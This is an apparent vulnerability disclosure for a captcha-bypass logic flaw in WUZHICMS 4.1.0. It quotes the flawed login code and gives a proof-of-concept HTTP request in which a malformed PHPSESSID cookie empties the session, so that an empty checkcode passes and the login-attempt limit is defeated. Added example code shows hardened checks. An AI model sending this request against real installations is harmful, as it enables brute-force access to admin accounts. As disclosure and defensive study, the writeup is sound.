WUZHICMS4.1.0-Captcha bypass (logic vulnerability)

Vulnerable file

coreframe\app\core\admin\index.php 131-159

    function login() {
        if (isset($_SESSION['uid']) && $_SESSION['uid']!='') {
            MSG(L('already login'), '?m=core&f=index'.$this->su(0));
        }

        if(isset($GLOBALS['submit'])) {
            if(!isset($_SESSION['code']) && $_SERVER["SERVER_NAME"]!=parse_url(WEBURL, PHP_URL_HOST)) { //!!!!![logic wrong]:"&&" should be "||"
                MSG(L('session error'));
            }
            if(strtolower($GLOBALS['checkcode']) != $_SESSION['code']) {    //[Weak comparison]: ''==null
                $_SESSION['code'] = '';
                MSG(L('checkcode error'),'?m=core&f=index&v=login'.$this->su());
            }

            $username = isset($GLOBALS['username']) ? p_htmlspecialchars($GLOBALS['username']) : '';
            $password = isset($GLOBALS['password']) ? $GLOBALS['password'] : '';

            $this->check_login($username,$password);

            $_SESSION['uid'] = $_SESSION['role'] = 0;
            MSG(L('username or password error'),'?m=core&f=index&v=login'.$this->su());
        } else {
            include $this->template('login');
        }
    }
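The two defects marked in the comments above (the `&&` that should be `||`, and the loose `!=` that lets an empty checkcode match a missing session code) reduce to a small function. The block below is an added example, not WUZHICMS code: `captcha_check_vulnerable` mirrors the original control flow, and `captcha_check_hardened` shows the corrected check. The function names are hypothetical, and `$session` / `$post` stand in for `$_SESSION` and `$GLOBALS`; the sample inputs are constructed.

```php
<?php
// Added example, not WUZHICMS code. Hypothetical function names;
// $session and $post stand in for $_SESSION and $GLOBALS.
declare(strict_types=1);

// Mirrors the original login() control flow: true means the captcha check passes.
function captcha_check_vulnerable(array $session, array $post, string $serverName, string $webHost): bool
{
    // With '&&', a missing session code alone is NOT rejected when the host matches.
    if (!isset($session['code']) && $serverName != $webHost) {
        return false;
    }
    // Loose comparison: strtolower('') != null evaluates to false, so an empty
    // checkcode is accepted whenever $session['code'] is unset.
    if (strtolower($post['checkcode'] ?? '') != ($session['code'] ?? null)) {
        return false;
    }
    return true;
}

// Corrected check: reject on either condition, compare strictly, and make the code single-use.
function captcha_check_hardened(array &$session, array $post, string $serverName, string $webHost): bool
{
    // Either a missing/empty session code or a host mismatch is reason enough to reject ('||').
    if (!isset($session['code']) || $session['code'] === '' || $serverName !== $webHost) {
        return false;
    }
    $expected  = strtolower((string) $session['code']);
    $submitted = strtolower((string) ($post['checkcode'] ?? ''));

    // The captcha is consumed before the comparison so a wrong guess or a replay
    // cannot reuse the same value.
    unset($session['code']);

    // Empty submissions never pass; hash_equals is a strict, constant-time string comparison.
    return $submitted !== '' && hash_equals($expected, $submitted);
}

// Constructed scenario 1: an empty $_SESSION (the state the writeup describes after an
// invalid PHPSESSID) combined with the empty checkcode from the PoC request body.
$emptySession = [];
$post = ['username' => 'admin', 'password' => 'admin', 'checkcode' => '', 'submit' => ''];
printf("empty session, empty checkcode - vulnerable check passes: %s\n",
    var_export(captcha_check_vulnerable($emptySession, $post, 'wuzhicms', 'wuzhicms'), true));
printf("empty session, empty checkcode - hardened check passes:   %s\n",
    var_export(captcha_check_hardened($emptySession, $post, 'wuzhicms', 'wuzhicms'), true));

// Constructed scenario 2: a normally generated code in the session, submitted in a different case.
$session = ['code' => 'ab3d'];
printf("matching code (case-insensitive) - hardened check passes: %s\n",
    var_export(captcha_check_hardened($session, ['checkcode' => 'AB3D'], 'wuzhicms', 'wuzhicms'), true));
printf("session code cleared after use: %s\n", var_export(!isset($session['code']), true));
```

Running the file with the PHP CLI shows the first scenario accepted by the original logic and refused by the hardened one, and the second scenario accepted once and then unusable because the session code has been cleared.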

POC

exp:

POST /index.php?m=core&f=index&v=login&_su=wuzhicms&_menuid= HTTP/1.1
Host: wuzhicms
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Origin: http://wuzhicms
Connection: close
Referer: http://wuzhicms/index.php?m=core&f=index&v=login&_su=wuzhicms
Cookie: PHPSESSID=l2cj791pegou3rmvtb86drui54'; TFq_siteid=M0RkIN5aqxivSePkL2cUow%3D%3D
Upgrade-Insecure-Requests: 1

username=admin&password=admin&checkcode=&submit=

(I have set define('TEST_CHECKCODE',0); so the CAPTCHA is generated normally.)

result

\coreframe\app\core\libs\class\session.class.php 55-59

When the PHPSESSID in the cookie is changed to an illegal ID such as l2cj791pegou3rmvtb86drui54', the session handler in \coreframe\app\core\libs\class\session.class.php passes a freshly generated random ID to the method WUZHI_session->read($id) instead of the supplied one, and this results in the bypass.

(The automatically generated new ID yields an empty query result, so the global variable '$_SESSION' is empty, including '$_SESSION['code']'.)

Login attempt limit becomes ineffective


The database also stores a record for each such session, and all critical data in the 'data' column are present. If someone generates a large number of illegal IDs, the resulting records could pose an additional threat.
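The session-ID handling described above (a malformed PHPSESSID is silently replaced by a new ID whose lookup returns nothing, and a row is still written for it) is the second half of the bypass. The block below is an added example, not the project's session.class.php: it models a session store with the lenient behaviour next to a strict `read()` that refuses IDs that do not match the character set and length PHP itself generates. `DemoSessionStore`, `is_valid_session_id` and the in-memory rows are constructed for the example; the real handler queries a database table.

```php
<?php
// Added example, not WUZHICMS code. DemoSessionStore and is_valid_session_id are
// hypothetical; the real WUZHI_session handler is backed by a database table.
declare(strict_types=1);

// PHP's own session IDs use only [a-zA-Z0-9,-] and are 22 to 256 characters long
// (session.sid_length / session.sid_bits_per_character). Anything else is not
// an ID this application could have issued.
function is_valid_session_id(string $id): bool
{
    return preg_match('/^[a-zA-Z0-9,-]{22,256}$/', $id) === 1;
}

final class DemoSessionStore
{
    /** @var array<string,string> session id => serialized data (constructed in-memory table) */
    private array $rows = [];
    public int $createdRows = 0;

    public function seed(string $id, string $data): void
    {
        $this->rows[$id] = $data;
    }

    // Lenient pattern, as the writeup describes: an unknown or malformed ID becomes
    // a new empty record, so the caller sees an empty $_SESSION and a row is persisted.
    public function readLenient(string $id): string
    {
        if (!is_valid_session_id($id)) {
            $id = bin2hex(random_bytes(16)); // replacement ID, not the client's value
        }
        if (!isset($this->rows[$id])) {
            $this->rows[$id] = '';
            $this->createdRows++;
        }
        return $this->rows[$id];
    }

    // Strict pattern: malformed IDs are rejected before any lookup or insert, and an
    // unknown but well-formed ID reads as empty without persisting anything.
    public function readStrict(string $id): string
    {
        if (!is_valid_session_id($id)) {
            throw new InvalidArgumentException('malformed session id');
        }
        return $this->rows[$id] ?? '';
    }

    public function rowCount(): int
    {
        return count($this->rows);
    }
}

// Constructed data: one legitimate session whose data carries the captcha code and a
// login-attempt counter, then the malformed ID from the PoC cookie.
$store = new DemoSessionStore();
$store->seed('l2cj791pegou3rmvtb86drui54', 'code|s:4:"ab3d";attempts|i:3;');
$malformed = "l2cj791pegou3rmvtb86drui54'";

printf("lenient read of malformed id returns %s, rows now %d\n",
    var_export($store->readLenient($malformed), true), $store->rowCount());

try {
    $store->readStrict($malformed);
} catch (InvalidArgumentException $e) {
    printf("strict read of malformed id rejected: %s, rows still %d\n", $e->getMessage(), $store->rowCount());
}

printf("strict read of the genuine id returns %s\n",
    var_export($store->readStrict('l2cj791pegou3rmvtb86drui54'), true));
```

Validating the cookie value against the format the application itself generates, before the handler touches the database, means a request with a malformed PHPSESSID neither sees an empty session (which is what defeats the captcha and the attempt counter) nor leaves a new row behind.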
